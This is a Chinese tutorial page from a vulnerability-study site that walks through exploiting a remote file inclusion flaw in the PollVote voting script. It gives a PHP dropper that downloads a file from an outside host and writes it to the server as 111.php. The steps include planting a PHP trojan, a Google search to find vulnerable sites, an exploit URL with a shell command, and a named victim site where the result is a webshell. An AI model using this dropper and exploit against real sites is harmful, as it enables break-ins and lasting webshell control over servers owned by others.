PollVote投票系统漏洞利用_漏洞研究教程-查字典教程网
PollVote投票系统漏洞利用
PollVote投票系统漏洞利用
发布时间:2016-12-26 来源:查字典编辑
摘要:PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,不过作者说利用过程的时候很烦琐,关键的时候又没说明白,简单的说一下``首...

PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,

不过作者说利用过程的时候很烦琐,关键的时候又没说明白,

简单的说一下``

首先建立2个文本分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?

$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");

$ff=fopen("111.php","a");

fwrite($ff,$f);

fclose($ff);

?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com搜索关键词"pollvote.php?pollname"

有很多,

搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了,

刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行http://www.skinnyturd.co.uk/poll...o.com/creatfile.txt

这样

phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类